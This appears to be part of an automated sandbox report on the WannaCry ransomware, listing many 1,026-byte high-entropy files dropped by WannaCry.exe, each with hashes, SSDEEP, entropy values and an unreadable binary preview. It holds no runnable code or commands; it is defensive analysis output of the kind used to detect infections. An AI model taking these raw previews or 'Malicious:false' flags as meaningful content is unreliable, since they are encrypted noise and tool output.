                                                                              Preview:...}...........X.....).zT...-Y.3.....U.|B4|.....].%N5..../......r........p0........Z/.3....`...=..f.....G.m.t|......s%.=...i....AqW.|e(..'..t...R..*.Z).V.....xV..QM....I.7.~...8.u9.,.&W...#.........</.....NJc.M..G.mb.,...q..B@..K..r..<...4bI..........4w.....b..(...J...8....ff`N.u.5&.:.+'0..Q..{.#....wQ.{..H...X...r...3........0...........;.!.(...E.6....l^.x_..BN.?n........QQ..=..'.j-;..p.L.`......9.B...v6.IP..t.n..H..3.).v^.P..v.r.A.....43.S...v.L..i..'}.">?1CQ.e[Ubn..0|..<..+.Hv.S$...ao.4%>........@.]U~J.....z....f.}H.;....q`......[...c...g.P....k...k.....[...+..P.N.F./...B.%..~..5S...mh{......,MM..^.F.0.7.),53,...\;.x.[.=Kw...0@a.v.[.:.]U..uS..vO.W.S.4..T54.D.1.....t...!...Y"..t.C......Iq.c.......1]....r..B.I........q.E..k<....n..1.....5....Jo.0j....C3)(............GR.....)&.se.....7.;...yMp..B..P..t.._.....1i./.X..]."zt!...ZNyr.T_.'"X<q.K;.A.....N.....u.,..l.......L.V..O.a..........S....i(.Zh....,.......;.s.!.z).k..P p.SL
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8242280281446455
                                                                              Encrypted:false
                                                                              SSDEEP:24:CNNjBWYgU3fgAhiMbzEc5vkrPAyUQslXXGOec9Jnt:cjgYgU4/MOPVUQslXX3/t
                                                                              MD5:D63F49243223284C70BFD6D5971846EA
                                                                              SHA1:B6FE7E9013E1133DE03D2D737596A5C8EB9960D0
                                                                              SHA-256:6CBF78AC2F561FFD7F2A65E5780D4864A5B7384687E780F5A7EC641A523C4847
                                                                              SHA-512:75DC8161488BDDDAE95630DB962CC40CF660E361EE01EEEC981180B41E0C4ADC59C25C01C10198D1AE3BFD0D1AEAF99B386D07086FDE35609A2991B73A774624
                                                                              Malicious:false
                                                                              Preview:..G.....4V.C..pn-...i+...)......O<E...&d......ksY$j.%.......@..v...Q..NS.....U*.. .;.S.;].U.....e/...-~....6... .<3pJ.u~..u.2.4.L%.4S..!..5.........7...S.r./,........;;S5..B.H.~.|s.A......F.6.E8..."......}.'%.|#.Z...}DR-r.......H%....(5T$....".g.v....R=.....$.4....D.Z;.z.....>.-.A..j.^/...l..z..E..OH....._d.@.^..Zh}g.f..';.i!,.'.m..b8M.v..QI.f....,>..9O.,../=..ME.......v.....]..<".?..q.N..D.~K..#..+v..)....t.s]G.o|+HT...NaW.ZJ.....j]-......b.....m.x...]'....bh.{L>;.n`...y.wdC.b.k.......J.h.ZV.(`.B9...D.?*.X..........5o.E.....(O.lj.6.gq.....8.s.'......M.<.b.~..".....[d.[ ..6..N...,l.b>d.......{...w...(.>.*qol..,J[\I..x...T...v.....$..5..;..w..]..4.t..n..d..A.&...$;>r/..x...S...B.....#..R...M..=zn.I.a....w....z......M....~.z...,....QI....>.?._...P..R.*....Ht..9....IB. .v:5...O.|2f....d.t....d......4"K...$..2v.>.l.....t....-.b....(...k..?.J..0.<....1......<..o.....6n..k.s........W......3...........u...jS...q..Y..;...@....u4.^5 .e.^R...FF..3..`;.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.827509091256339
                                                                              Encrypted:false
                                                                              SSDEEP:24:rjPgzVU+0XLziEKXXDGd/POaO3DHpBeKGGGoHww8rjn:nPgz0iVXXDK+aOzHjEVw8rj
                                                                              MD5:C12E06DF2F7E070A25625639A182197A
                                                                              SHA1:4106C2E71BDD4E0D7880A793ABDD28838907BE95
                                                                              SHA-256:7B2F702F3328B37AAE706DB55AC751D5BAA43957E23C6DF6145988891C74BE77
                                                                              SHA-512:14BCFEA202D690AB625C0E186E9465B0B71CEF43AFDBF32197B5E29851171E41230DA4985A8C761C8065BAFFA1361B71F1D118E470E16324E8639A80DA421788
                                                                              Malicious:false
                                                                              Preview:.....j...fj$.B.....L.L.]vw:..o.;...._..!..y.,.*;X._.X^.}^IkFT./rF. S3..G....T..\..N.+..K.-._.4.P..L.J.E...........k]......;.ga.i......K..(..0....k...7...'.J..J..t2.-O..*\~.......L.nL$.y...O..j..~.}..Lf...6.......!.~...rJxvv.>.1Q.N5u}~...........T7|..b..K.*....H<...5b.t...r.D.!Or..].8k..p..:...d..C.}A}2..J.#..@7s.4...V......e.>....JHyz....n.X.P<..@6...I5...F...Y.x..G.t.._...EY?.*|.A.].J..(..n$z..J..>..#H.[.0..F.V...<K..N#...Ap^.x..e.......+.?...0..RI..C......o.....&Q.n?5..j`.(..S;Y....f.R.?.;..Zb...... .0...h....1...'z{..+of.].....G.....I.m...=~,mk.....D;................=.<5.l.N4_.+..D.'..._....q..q......%..\.._X..<.....(..V..{3...e+..9.yx..m$).*.......`..].i...mE...?..Z.q..]~v.c......+ .5i.@.0...........r....72.Y..H.7Mn.....tt..........Z.....-.`c.g...]......!I..m.P............g...Uz.u...!..'.}..\.P.n..;....K1.~.d..Sq....A....J1.}w<i.5.b..v.......&..O3.{F....&...t.g-...v....=G.....gm%..VI=.E..^..N.../g.,Qf..lo.*.^....L..[.I...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81582071214866
                                                                              Encrypted:false
                                                                              SSDEEP:24:E/JcOrIm4QbVE0YZtvX/dNm08MhN9PJJDd256yhKQi:EiOrSQ5feXSGPJRdHH
                                                                              MD5:E30EE4A4B02F1ECD40DA22C40437A303
                                                                              SHA1:F50460430B32181A2D4FD4026FE3C0D91464AB9C
                                                                              SHA-256:70E92D63B508F309D9A40E7229C8C4D727370F6579761649196ACEE2F1E415E8
                                                                              SHA-512:094C485528A29D2D01FE5EA4E6B357116F0D5004EE88282FB2B0C70F41C496DB8ACA9D96FA2F3CF5274CDEE85ECFA080A87E3BB57BD0017CED13C4D1E2620723
                                                                              Malicious:false
                                                                              Preview:....u.h....s4D.....l.5.h.b.V.t..\....fd.a..|..H.Kg....b.....3..8ni.1..._{.d.......\...F...M....An$.x7..d=.h.OI...y..Qz|..9..?..k..#...X...>...j..>.M.:....xrP.!.`.MIt*...{..f.....c....U...).`.5|.^^.3'.;J..R.k..^m.....OfC....j..?.#.!h.I..>e3o(.)W.G......C.FS+p....gs.J;....w..PlP...fu.+LH1.......,...'.Z.....i/Y~....+.&....dm.E..m..'.sU..A6.[.Zj.C0w.].J....%...!3.5....m.F.;9.r/.8N..|m+.h.A.'Q.RK..K.../.^.8W.o.....X..#...y...n`>.6e.J-y\.......Q8....j........6.*$.......l.bQjf\.....:..fR..;o&.]...w...\..Q(..w..k.-7.J...C$..2..a...g.U0.;...P.i..'(l../f<....3..%(C..-7......5..z.....:.1g.......u...... ...d.......sG....P...K*.. .\.....u./G.4......I.y. .et}>..Z..f..o../..p<._.f.z..~E.....%..U.!..K6....O.0$3...#Qg.....58....:.iL6...PD.:Z8[U..c.#WN[`.C..+...|.B.kT.`..#.OJ p.w.I.t..3..gnQ.[O...:.`..|e........`.ma"....#3.a.^[...[.?U....|......E"cS...Q..TrtoW4....O......#.7^..(....V(.B*......Q.7..x..p..8.4r...`.Z.C....F5.;.Df...%..3..(..zU.[8..q..7.(.c?
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.814961811172585
                                                                              Encrypted:false
                                                                              SSDEEP:24:JiI3ozGdlggQKVFUJw7W/YUjJuU+FxCdgjL79vRzf6U:Ji68GdlggPVFqwW/FYU0wK3795z6U
                                                                              MD5:4C81BBD2367B8AD70B6952C4DD4E9629
                                                                              SHA1:035D7B2E34D8DAB9263E3B59E3C9F151CAEB23F8
                                                                              SHA-256:CBD4F844FDCB94095E0F6850AF3506B9D47C6078BCCE9ED5EB72D932D9536191
                                                                              SHA-512:9F00E3312DABDBD82AEF9C062C782DFEF8BDEA723EBECCD97EB869D5FAC72BEBA512F2128CF6F37E45680C90C60AED6A2EE655122B7EE44EE1D58174AEE87E17
                                                                              Malicious:false
                                                                              Preview:..VUW....P...r.+o7T.w.3..j.f,u..M..nw.{]aC......u .2[.FT.+.._'...._..c5%c....H....:>..%.0-D0RPp0..........4...K....Z.<V.....(V..#..?....:......NN..p.'... 2dw...!.l...[.C..i..3~p]...V...y.......m.1..M....o.P.L.8......A...H.E..x....U.9.G7ZR....m..Bob.3......B.>...j....!07.. m.A..)..(..........-..!..B'ap4.`#...].C. .a...+.......x..8........(...pz..S....j...q.u..Vu}.(.tv'7^...b.."F...'..C.j~V.kby3.~b..[fj7..n....!....~.N...`G....&~..,..2g.].#d.....M'.1..*$XH.....:.nRai".Z%.V..!....rV..`.zubA...K...4..W.T.Q.b.gf.iXx.{..{A 31...P..X.\..xeYq.....*...T..r...9..:.8|v.....V..|..v.O..CI2mz.y.6l.. ..{.........Cc..c1.....7;..,U..;...ra..#...E.....[R.\.</.....{%...&:B.?.k...??-.%}...l...r.Yq`.o._..v......_.A[0.w.qN.r....s..)$.c\..X..V.2.$.f(.-.,..r..R.`!o.C./LU...Z.`I..../.I...v.....G....0..yJ.'o./..A.......l.......*..R......0.......O..?L.".kC>-).A...6.&.....4.....iW..xq....m..z1L...T.2ek.1..].....*8..K......\i.k2C.X........e.|...'U.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.816302414966488
                                                                              Encrypted:false
                                                                              SSDEEP:24:FF37to1SQukM5IaItYOSklOvVViFCt1gn5Ygem5RyXHNDqAbdeEa:R/kIIaSYPklO+FCt6YvHMAcX
                                                                              MD5:38F7DF00FF43BE76DE8BAEE7B17FBCA1
                                                                              SHA1:B2FA1A084B933B89EE73C1AF7CB2726A966E0BD8
                                                                              SHA-256:78E16A7E5FEC24EE04A66D8881A25483479CD7A860F3533B66D935115427D4CB
                                                                              SHA-512:62BC4C1220398B0ADF1B5C3DC78A4C0FEB3CBFCA110371D91C509A0539963FB1A7C1146AB772EE41BA01654CA329FFB10B39C90FC88015288A6751EA9C74BFF4
                                                                              Malicious:false
                                                                              Preview:~.1....s.j?.....j.Q....VG...<..8..`...8..... ...Cz.y..Y....~e*.'.}....B."4..:.S.....or2P.H............(T]..+6.m...$!!.....IY....W..5bD...=..&<L.?/.|.-);.=B,T......7.,m..i........c_..k...%....:.......h[..{..=Xe....%....x~l..L..o....f.~.D"...$..g..}5.....^2..2E.g.) ...n.h.0.m..I..qHx..%kZ.2p..={...N..-...x.!.D4-.2.+.?_n.X+6.K..(..7......^;..z.u......y..b.~g.*..5.%S:.....j(..`O..m]..|K#..x.1>.}.\.......L...4..m...p.;..Q5...V....,...&0M.J.i.y..'9..........l..d.....%d..4.)........n..g..")'.?d%.~.3qd..;4.m.5....)u].;....%3.g.G.l.CM...o.....G)[c(..W..un...3H...k...HY.....K.jM.s&..=..P.3.........u.%.d8.........C)fN.C.....5.<.O....d.'....3I. .{a).zxy...!M_g.8..C|H..O.u.......N...x.Ik...:...ag.f.r.cR#$.......E.u [.P.?.B...l.Zv. .H}.....\7......P..c.ZJ........=.mU.6..B-Y,..(K...... #.u..G6.6=Z'...Mkb@.AB.}....2.4...&7.....s..I...O.$..s..i.u'.&P..18h.4..1..<c.2....9idF.Fb.x......cYZ{........ ..j.~...FLA.........N....:..A...o6..@Jt.q
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.812678158521236
                                                                              Encrypted:false
                                                                              SSDEEP:24:EgrVXMP7K+ZnIkP9qznjVOacMmsKTN6iXhPoWNkJ5S:JrV27K+T9qgaCXfwS
                                                                              MD5:8BB170D8EB7AF0DFDC37348165396206
                                                                              SHA1:2569E3BFC9AA957234C5B058ECE53BDCFC4F9E2B
                                                                              SHA-256:4388CE57EADE3CDAE8DCA17A46F109C5B3B4EAACE78A33E391BDEA3C9034F872
                                                                              SHA-512:5FED2BA12158D04FCFAED4E4A458B2BB427331D14C08408DB7720A2E925DC09270010DDD033B45AABE59686EA8E201F8C2B5D919E6C9AEF42FD09FC21E52B0A5
                                                                              Malicious:false
                                                                              Preview:H..m:.Y..D....@..m..|.bl"o6....v...0j..>a[.....L..Ou.`...E.wx.w.r..VR#.*N......IW.6@{knv....0...nj....}%'/.Pt....L.)..D.V.../..W.........;t...3........O........V.b..<..$..h).....!....5........'...R..r.......Y....mV~Lj..h\d..4?.I=.K]...#.<..h.9K..3V.{.......}.. .x....v.i.X...i.XQ.$.....e5..Op...%#..G.ep.X.._......Z.*...9on........_.*.;......z..<E5E../S8...~..O-..&.?..-*..w}..C.=.....R..2....W.[..{..z..&...9..y...Xi....[.l....."/.t.}.y..\.bOzX..:."..{al..n.|..../n.1.......`.#a..y.6..k.HI.......7....OSe.8..9)%.Y.%GM..N<.r...5.cn^.c./:.(D..*.<P.#..[..._..UH.........#.eT...^....P.<.O,.zI,...&.f.....L..%k.....,..%........<........,.@.zC.<q...7...-....k....,.K.".-B...Co...$q.m..W..$.f..:w.%/....H.$B.v.......bWJ...T,.~d.........ei0..gQ........02...W.$~x\.3..0...>(-..6v5.>.e....nc...,.4....~]$.3..`A)MwQ.lN|nB}fL..I..$..?p.W.....\.....3.=D.;A.h'9q.Y.>HK..ZD....;/.....[M3n~..j...]..P.l1.1...D.2.......m.i..z)..;.r.....1.=+/??Tf.E.B.egh...-$.].....`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.827059988900444
                                                                              Encrypted:false
                                                                              SSDEEP:24:wQDQyAOUZhFDfYURFlxvbTT/WVJnTojr2OjcnynqC04yVxlm6/r7S6uUf4:9DQyFUZhFbYUDlx3LWar2OYn1Ceq6/Py
                                                                              MD5:53FA8033E4DAA45A5681B144866F7E9B
                                                                              SHA1:51871BC69B1586C5AAAC9B2D93B0C7DDF6306A92
                                                                              SHA-256:B759B863E9CBCBFFE6DFCADBD0D769B2A7E79B73BEB96AC647696D2F0307D939
                                                                              SHA-512:3D979F925ABAF4B7BC0F123A01B78945EC012A2884BC9E16B4DAF5745BBCA8B444606F0E1726529E28B4158D73FC1B04A4AD7781AF000674E067DA8198C4AE4C
                                                                              Malicious:false
                                                                              Preview:...n..|.N'T....Y.......mh....9!.^Qo..P?...>..6...c..EL.a.2..@.zr..(...Wt...^......-p...3,-..6.)..].&.......).onu..(......+8'on...S:...D6B._..*.p4.F..O...U..f..mLM.IM. ..j+w_.....^.G../.eX-)Nd....Iw/s..L*..b.R..=PT.R.>b.-...sO.wj.<.n...g..'s..#d..B...y..L.}.j...Kj...#.h.......UNQj#....%k..+C. i...1._)c...J.9;5.^.....].z.lL...P.~z..l~..\....v.!h..q.......6.....zX(..]...=!..@.@.L.1.GzPP..y....9....xT.k.o|.[.......~..b.T....|..f......B..............]...P.`..+S4.S...]BD.......f..D/9..l>..f].......J...PwDX.....t...p$..{.P5.....85.H............u?..D..\P..0.......a.k.N1.P..?..V...M............3=7sk...3..G...)...6x.ir....pt...9...d.._..Q......5.*[>......f.)5....Z......Y...Qn.5sA..?.....]Gh.>R..cP.5.m....Q..e.....\t<....S4x\.%$.....J.$o....^...A..$;~X.o.\u~.>.....5.g.b.2F.......U..m-...Z.P..)....]...!i7'*j...6KOu...P.)..K.....-!I....Y....);....&.04..u.W!..cE.L..-...6:..I.l..>.`/...'n.....^.fK.kN...[...{,...+LA...B.7..(.2.3..H....P]9...S....T.D1I.....2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.811954310378131
                                                                              Encrypted:false
                                                                              SSDEEP:24:jl7al1+bgEiWUPlpelWDXl8wnGFltVX4rLOJvF:jl7svWUfCglKDIfOJvF
                                                                              MD5:D8E093FD66A89C726F8E463C615E247F
                                                                              SHA1:1A11EA4A712CCEFCD1099C5EB199F0B2E91BC25B
                                                                              SHA-256:D02F64D6B3756CB3B9802E578FA8FEA082056955397E4281A7416A837F04E92A
                                                                              SHA-512:1694FC731FA6355B78A563FDB535909BA46763CF70C58D47B832980E811C3984A752E243D46950CD7A1D410B866783617190F8DF2CED0F6A8968FD8A2505B9DD
                                                                              Malicious:false
                                                                              Preview:..J.CJ.......}c..c .m.x...=SV.r.......W.d<.......d....d.....'...E..$Z.^.......:.&.....k....D. c..Zv._.Jm.2..A..P...L2h....:.m}..}..6..I.o.P...1.(q..........kb..c..h.J.....!..R..h1...b;......,q..k8...J2...G...qZ.`T...<j...(.C.*F. .w&.L.l..TU.H8.cL..3.;wO.]&...1.10s?.....YY.v^.9.*1.v`..u...M...a..hd..5..|.......u..$.>..dY.T.s.p6..M..$n.L.c....1..f..U!....z.q2E..YA...*0...M..........Q"l.Nz.]/..h.A5..g.!N.#..[Y+/.oM.ii..vt...0f/....#.......[..&.X..oN...x..G..YDt...%..S.E..#V.(#.....UOKd..79...m.v.;E+,..z7U.H6.x..J.k]H'o.x.Q.....`.f......ySis....X..6.*.!C.F....xGhv.z..|...?.....3.}u.C..R.........ss..!`.L...R. .......bt.+.hg.=fn......g.D.kd.....l.&....k$<RAK.......U8l.lsi...W....C...F........Z.L##y....r.V....y.kJ.....^..U/....P....W.H..(ep.lB..9...r...0m.S.P..Hpc.w'.U.U.y..Z`R1.1..c..\......T....-_<........)8.....#....q....t...(.x~..+?.r.p...\.b..a..l.. .@Iy`.em...:_*.c....S..N.c...r....^..\.PF.TY..n.K.~.J..B.6(..*.6.71..z....7*.f.4...6.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.82700024867395
                                                                              Encrypted:false
                                                                              SSDEEP:24:vzTlGT3PBf65tHUg+ym3XYUcOWrO6zAEcH1HZT3Xe91:vzRGT/KOP3XiprOKS1HZT3uT
                                                                              MD5:B7EBBAABB948AA71D322BA5B7E54FE1E
                                                                              SHA1:1122997B84E1FFD3182F448FF4AFBB994D95B763
                                                                              SHA-256:8E7C2DD0C00CA16DCC4F20BBA96940DF7D7F81339C9F3F94AC2DF1378948EBB4
                                                                              SHA-512:98E737582D445BA1779A391FA9509F49DBAFA0E54258173587A9C5D544AE3BD86D6FDED35A7D14DB70ABA568E6AB216E0144832E75EEE190EF7F1AF3B4129B48
                                                                              Malicious:false
                                                                              Preview:...(~.;.qj.F2.......-X(+X...1....N..`y....E4*.Y..S@...{.b..w.K..M./F'.9.2.2.$..q/6\.L?k[.U.8.6.k.F..`2.j.c....d)....;;\.z..K...^....L.F....gs....T38.yR.+..NM...n.t...MC.#9(..:.MSu!...,t..gl.J..B..n].]8.....LX.t...[..J.....s?.e4..+w....;.J..N..}`..&|...Y.9...6n....V..@..a....X..I.%lJ.^.n.).wc.Y...._.....hnp..2.).s)>}..#@c0>H}....K,.g..w.=.i..C..T.sn.6.jJ...3.....yI.t~..E..K...~$.....o^...#...C..X.5.....a.........~....a.u]...k.h...)O.&M@.............?..%...]......D.......w.'.V...WS....B......F.-=i.q.oD..a......k.....q..0.q:_0,.`."Gxo.Q.-..i....]...8.....nA..d........c.x....m..........#C.=.LH.$...M.^7....@iR-..;l]....O/yv.Z.P.#..p.Pg.m..&..v.t...eq/@x._h.w.H.i.JfEWI.v...,.L.A....^..l....n.. ...Hr%>.m.....v6E.8`o.0R.U....:I6..f..&o... fg>_.5........./|E.K...X.F.Q..(....~...w.....g.."my&.....\N......T.[I....?..*.v..c........uR.........N~t..j\....Ijr-b.......wg..Wc..kS.|..f8.|..I>....e..f.B.y.!i,.y.HF.I.q(Q.x_....A%......:....,E...@.-.j.Se".*9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.808130402300298
                                                                              Encrypted:false
                                                                              SSDEEP:24:u+l3yzFNlJyDcBYfB8xEkf5rFMYx+s7zbtnUbf9JP/2vsZ:u+l3yRNlJyDcBUB8akfd6Yx+at0f9J2k
                                                                              MD5:89CCA84664EAEEA8A4FF0C4D8EBA112D
                                                                              SHA1:4E4BF285912D16133F2F91B600DC2116796DE40F
                                                                              SHA-256:CBE074DF8944F820D0B9478947244EC0CAA0332CDBC459DFAFEDF7CFC914F193
                                                                              SHA-512:0C47C32E76C0FADAFB966EAC71ADFF84EF51199891D6B3366EB10CECDEFE72005A0C9D63115279017F18E7B1477912F2E831CD2040E51312DCAAA71039E14ECF
                                                                              Malicious:false
                                                                              Preview:..XU$_..y...\.../.o.fB..F.z{....7$.~#u..j...CV+....DnV.....V....yO.%}........'.......q0......#... ;.$...S.-..._. .vy...Ld...rJ6.6...... .....#j.D.......d..w.u...2.=...a...o/..h.L.X>c..(....n.>.V..b...o.Q..W....N....m.....V.e.z.D...`.S..X;.Q.!..U..;..$...w.F...........Qj.H..[A..x.ZO~f.`h...E..?.a......I..K..\..KL-...5..!..+.@q.w[......E......7...k~........W2wI.@...../..~..u3K.]..x......B.]..B.,..T....|{......=^F..D..7j^......pG._..5F;..\{2*_.M.y......a.]......woyN....P >\p.S..R...%.<..G$.s...6.s..QPe..0DS.A.T..^.R9h1...}!:.>.N`..u=.cb....r...mbO...\..S.....g(GG2....@....A..S.8*W.6..?m..g.......|..)...B.ip-f#n..>Y.I....> ......$...7)....A@.......X.Xr.s.>F..D..W.=.Oh=..v./6cI...K.,{'......`.\U.E...t...mU~v.Y~...SX..$.<.IA.s.f....j.Q..O..Y.9.a3!..r...Q..k..i.ak[.....U....qi.T.'..+....V....n._....5....9.M%.E.C.e...2w.G. 56.....7../:.@1....f.A.Z*[=p}.[....)W.R/{.././..2.z.Z"......e..\....;..FZ=..&.s........a...q.`......E...`9.rBY.|i....&.........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.803578256493422
                                                                              Encrypted:false
                                                                              SSDEEP:24:qAvVBUfHT9NaZFaYwD3XL2iHYh9BL7FK5jTlln7VW4z:bCz9NaZFaHyeyBLwjD7VW4z
                                                                              MD5:3B5970397769BD90C362F2754FC882B9
                                                                              SHA1:92249D263F5B49451DE121BCB531805BA9C05C92
                                                                              SHA-256:F5CFC5D232B58D76DAC94D4EC4B03A976CDF0E85ADFCC20A23B2BB13B39B6E01
                                                                              SHA-512:AFB4A7D7BE8FD1110D4B30EDB5001BF3144A1612ECD55D14B54CE37226F1E11FD9D9F0E5339BA90263386E0D8E852178DE181F235EB97A208C361403AE5A40C5
                                                                              Malicious:false
                                                                              Preview:..?A.Ih..,.........u.s+.....)..w..c.?3.d\2...+..c.Y...3.I@...R..fn65$..3.L.......t.c*..R`.Nz.Fq.e@S.....hK.1....1.uL...v.+....J...Y7.!.K....*.YJ..A7....[e.q.h.9..c...4)....P..^..X.....#.....@....v$<..`..!...V......&..+.../.....U...7g..!..='.X].-...X..}p9E.a..0n..[..h..8..u..E.Pwt,..u..*..D..*..<..5-./M......~,......|...l.F.... u.!........[.M..y.m.'.'.....i.b#yS.N4]j#........l.YJT.....U..n.....B...bKf.f.Ee..6h..E.'...Z..G.Y...J.v.`S`.......o.......6.).=...W........q.........[....%.........W(......iMj...7.f{..z.?.d[..O..*'p.bTO.E{J.{..8.2O.....C.@.......U...bpr.3...}...EC.0...|8_..3:.oP,.E.@.\......;;q].h?..........$ d..6.j..2&.^.....5.-[~.s...Zo....&...Y...{.W..g...T.b..7.o.P .D..F.e.2Y.(l<.2...jH*,...6}s....u......X.....C...MC..j...mr......T..P~.....S.*dkg.PE.wi.#.Rq?.....{Y....m..n.......yG.7#{.....^.vw2.m.c|G....,.|zF2...O..0.\..../.vm.n y..*.b..'...0mjcI....3..Z.......L(.w....;..;<0T......).Py;aFk6.&49..>%...Y. .#..Y..Y.C
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.789149180537311
                                                                              Encrypted:false
                                                                              SSDEEP:24:N0nmFpkkNJy4B9rNGuPHwLjDWywr7EZ7o8n8Jqnc/ZKwD:NWskkN84z5xQLj1Y7EZ778JxowD
                                                                              MD5:EFFB3D2D54989CAEE7619C24978CFD7E
                                                                              SHA1:D0B42BAABEAA27431BE577641684B2E66A6C8A6A
                                                                              SHA-256:D2D186CEBDFD2DDEB05DCD68E0884F7E56DD4B25FE23E6BF556D6E12A818B595
                                                                              SHA-512:18278A2FE03CBEB5DBDB44331F4E568F64840110EC60749782636C8FA7B258381D07F4036FE6603945D4E63042B3405A8D092328A4B0D7F9174350B1CB547D0A
                                                                              Malicious:false
                                                                              Preview:...w...Xg'.g{..I....d.......g_.U.^..>q...Q.."...............b)......5.....E..Z....t^...[we..n`.c...4h.I7.A1DWI..f,S...GA.~....INS.."...er.'....r.?......8}.....&..a=.hL...G...BF.......W.v..4.yhq&.{..M4.lj..)."A.A....f.l.3...+..U{.&.''..mN!q.......#....N...N....i._...+N...7.^.\....2..>..]..,....@...*.F.R.....%8..A...<.r<?.4.x...&.O.Wd...7......&..../@..3,..u..n...-...9..@..3..%...b..|.D........8?.I.3.....lpQ..v(. ......+.!.7..1..T5....v.;.......:. ......#R\D.....*.P.>@.T........>...@Uj.)..l[.R.....Tp....I@......@....]<.. ...'.z\.....FjvD..... .Ww..z.j.'..M \.?X.fA....h..+..X{4A..2l&M9.qD...................1..&.j.....[..E.f....$.GMi...J.3.t....S.R.@.>r..#9K,IF!W.s.X......=.>.&.....cl.A..'...4o... .*.gYe.r1gtL.(..:.e...7...0.R...v......IOT<,.u+.@I.N.s?@.2.{._.....c,.....,...n..Z...7..!e...K.`gz.:..R..B..A..;.....2....W[..D.........MKE+.2P...dQ..}...^..!....J..|.T....8;1...2.7R....<...k.iO.l.p.T.4....$[sq.. .8B..$.7....i.....:a.T....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.817601343965613
                                                                              Encrypted:false
                                                                              SSDEEP:24:dMa0gPmS84RyJf22Ijbz4/3a1nOYkkJsOz2ZhD21WDRE6mD7PA:e+PmSX4Ju2/qSusHC1GilPA
                                                                              MD5:D6CEB8C298B67469500743CC40B46601
                                                                              SHA1:F5B5A6A020B660A6CBFC826C36840251EF343C40
                                                                              SHA-256:D9A9BD8F54A947F7108CD35A03E159D6A947D1B9A94FA890C10B7543F70C0E08
                                                                              SHA-512:88994EAC4BB3F702C9BFDE755054AF253D24E664D2D3D42633D1FECEDE318B28AEAE9E64C2940F6F4A747676A1EE94DDEF6631DD71F31B48AD19481F89A9AE24
                                                                              Malicious:false
                                                                              Preview:../o....{u.......[..EQ].j.:F&\..*...b/H.].um.@.e7u..n4g^.^7U|.........{l..u.G'f.Na...T..-...};.8.Aw.1...D.=.U9....c.@.{#.F...zAW} 3.1..|ZC...\..K.i..e... jv.\.u#I..|{...>..6Nt.MO..h....V.O}...B_7O.C....>;...Yv...T.&$.?..-...l..w.hS.O.[lh.K9...#...t..I..2Ap..r......&....{.....A..z....k&..B3...i)...W...$._).. ..A;./.....$.d.F.,.(>9`...2............%.y...E.....<..d.]tp.8.%[.E6LV.\...'......=.`E.\A=....5@8k.......g........i.%.2Xv.].?v_.,~.N...?.g..Vca.F5i..M..k.40>...x..V..........D.\.@.d.h.H....:1.{.......x>..n...O.iT.."na>...lG.ij........J....Yg.k.@S..%P ..rO..Q.t#D|q.y.H....F.@..l.6WX.Bv..x..Cc.;Zd^Kvm<w..V.....C......9=........L.S..=B...1r..n&......).....K.}.p..AX....P.!)./9.8.txr...'.#...P.f.C.*S8..{...(..-s...N..E..........Y....b.>X..3Z....U+a.z..k...=JH*.v......1.o....P@W..u|..6..Q.4..\......Ni..H..^...d}M.W.(......z.7.P!.E...}k.y.[.z.J.]:.....x7.4'.7..l..s.Q.49...[....Tk..U....:^>.A.5...A.a]...:..5..qUl.o.m(..lsh..G./..Vz*8.#oD....#....}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.777117489980487
                                                                              Encrypted:false
                                                                              SSDEEP:24:jsmm6c0OLCBB83/5p9KxxQYHs1Vh9Ju9E1ahP5yUE:F602CIFKzQYHO9/AhP5+
                                                                              MD5:C61EE02DEEA57827DA67C1D4FE563E07
                                                                              SHA1:461137EB69D9829546853581C29E0D3A4323D6C8
                                                                              SHA-256:F887B542009994840775984B11E30C8ED303A67A342491F35FFAC258A9DE301A
                                                                              SHA-512:CA38CF6B37D044025DE0CD2A1473B5ECAFC0F23F35772C94B387310250BE3DFB4826683B928F16BFBB62515DFF40FD35B3890B96D39BDA4B5B4A7ED621A1AABD
                                                                              Malicious:false
